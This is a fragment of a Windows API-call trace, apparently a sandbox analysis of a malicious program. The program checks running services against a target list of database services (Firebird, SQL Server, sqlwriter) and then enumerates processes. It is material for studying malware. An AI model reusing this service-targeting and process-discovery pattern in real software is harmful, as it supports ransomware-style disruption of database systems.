[0052.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0052.752] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0052.752] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0052.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0052.752] lstrlenW (lpString="DusmSvc") returned 7 [0052.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0052.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0052.752] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0052.752] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0052.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0052.752] lstrlenW (lpString="EventLog") returned 8 [0052.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0052.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0052.753] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0052.753] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0052.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0052.753] lstrlenW (lpString="EventSystem") returned 11 [0052.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0052.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0052.753] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0052.753] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0052.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0052.753] lstrlenW (lpString="FontCache") returned 9 [0052.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0052.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0052.753] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0052.753] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0052.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0052.753] lstrlenW (lpString="gpsvc") returned 5 [0052.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0052.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0052.753] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0052.753] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0052.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0052.753] lstrlenW (lpString="iphlpsvc") returned 8 [0052.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0052.753] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0052.753] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0052.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0052.753] lstrlenW (lpString="KeyIso") returned 6 [0052.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0052.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0052.753] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0052.753] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0052.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0052.754] lstrlenW (lpString="LanmanServer") returned 12 [0052.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0052.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0052.754] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0052.754] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0052.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0052.754] lstrlenW (lpString="LanmanWorkstation") returned 17 [0052.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0052.754] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0052.754] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0052.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0052.754] lstrlenW (lpString="lfsvc") returned 5 [0052.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0052.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0052.754] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0052.754] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0052.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0052.754] lstrlenW (lpString="lmhosts") returned 7 [0052.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0052.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0052.754] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0052.754] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0052.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0052.754] lstrlenW (lpString="LSM") returned 3 [0052.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0052.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0052.754] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0052.754] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0052.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0052.754] lstrlenW (lpString="MpsSvc") returned 6 [0052.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0052.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0052.755] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0052.755] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0052.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0052.755] lstrlenW (lpString="NcbService") returned 10 [0052.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0052.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0052.755] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0052.755] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0052.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0052.755] lstrlenW (lpString="netprofm") returned 8 [0052.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0052.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0052.755] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0052.755] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0052.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0052.755] lstrlenW (lpString="NlaSvc") returned 6 [0052.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0052.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0052.755] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0052.755] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0052.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0052.755] lstrlenW (lpString="nsi") returned 3 [0052.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0052.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0052.755] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0052.755] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0052.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0052.755] lstrlenW (lpString="PcaSvc") returned 6 [0052.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0052.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0052.755] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0052.756] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0052.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0052.756] lstrlenW (lpString="PlugPlay") returned 8 [0052.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0052.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0052.756] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0052.756] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0052.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0052.756] lstrlenW (lpString="Power") returned 5 [0052.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0052.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0052.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0052.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0052.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0052.756] lstrlenW (lpString="ProfSvc") returned 7 [0052.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0052.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0052.756] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0052.756] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0052.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0052.756] lstrlenW (lpString="RpcEptMapper") returned 12 [0052.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0052.756] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0052.756] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0052.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0052.756] lstrlenW (lpString="RpcSs") returned 5 [0052.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0052.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0052.756] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0052.756] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0052.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0052.756] lstrlenW (lpString="SamSs") returned 5 [0052.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0052.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0052.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0052.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0052.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0052.757] lstrlenW (lpString="Schedule") returned 8 [0052.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0052.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0052.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0052.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0052.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0052.757] lstrlenW (lpString="SecurityHealthService") returned 21 [0052.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0052.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0052.757] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0052.757] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0052.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0052.757] lstrlenW (lpString="SENS") returned 4 [0052.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0052.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0052.757] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0052.757] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0052.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0052.757] lstrlenW (lpString="ShellHWDetection") returned 16 [0052.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0052.757] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0052.757] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0052.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0052.757] lstrlenW (lpString="Spooler") returned 7 [0052.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0052.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0052.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0052.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0052.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0052.757] lstrlenW (lpString="SSDPSRV") returned 7 [0052.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0052.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0052.757] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0052.757] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0052.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0052.758] lstrlenW (lpString="StateRepository") returned 15 [0052.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0052.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0052.758] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0052.758] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0052.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0052.758] lstrlenW (lpString="SysMain") returned 7 [0052.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0052.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0052.758] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0052.758] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0052.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0052.758] lstrlenW (lpString="SystemEventsBroker") returned 18 [0052.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0052.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0052.758] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0052.758] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0052.758] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x636198 | out: hHeap=0x5d0000) returned 1 [0052.758] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0052.761] Process32FirstW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0052.762] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0052.762] lstrlenW (lpString="System") returned 6 [0052.763] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0052.763] lstrlenW (lpString="smss.exe") returned 8 [0052.764] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.764] lstrlenW (lpString="csrss.exe") returned 9 [0052.764] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0052.765] lstrlenW (lpString="wininit.exe") returned 11 [0052.765] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0052.766] lstrlenW (lpString="csrss.exe") returned 9 [0052.766] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0052.766] lstrlenW (lpString="winlogon.exe") returned 12 [0052.766] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0052.767] lstrlenW (lpString="services.exe") returned 12 [0052.767] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0052.768] lstrlenW (lpString="lsass.exe") returned 9 [0052.768] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.768] lstrlenW (lpString="svchost.exe") returned 11 [0052.768] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0052.769] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0052.769] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0052.770] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0052.770] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.770] lstrlenW (lpString="svchost.exe") returned 11 [0052.771] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0052.771] lstrlenW (lpString="dwm.exe") returned 7 [0052.771] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.772] lstrlenW (lpString="svchost.exe") returned 11 [0052.772] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.773] lstrlenW (lpString="svchost.exe") returned 11 [0052.773] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.773] lstrlenW (lpString="svchost.exe") returned 11 [0052.773] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.774] lstrlenW (lpString="svchost.exe") returned 11 [0052.774] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.775] lstrlenW (lpString="svchost.exe") returned 11 [0052.775] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.775] lstrlenW (lpString="svchost.exe") returned 11 [0052.775] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.776] lstrlenW (lpString="svchost.exe") returned 11 [0052.776] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.777] lstrlenW (lpString="svchost.exe") returned 11 [0052.777] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.777] lstrlenW (lpString="svchost.exe") returned 11 [0052.777] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0052.778] lstrlenW (lpString="spoolsv.exe") returned 11 [0052.778] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.779] lstrlenW (lpString="svchost.exe") returned 11 [0052.779] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.779] lstrlenW (lpString="svchost.exe") returned 11 [0052.779] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0052.780] lstrlenW (lpString="audiodg.exe") returned 11 [0052.780] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0052.781] lstrlenW (lpString="sihost.exe") returned 10 [0052.781] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0052.781] lstrlenW (lpString="svchost.exe") returned 11 [0052.781] 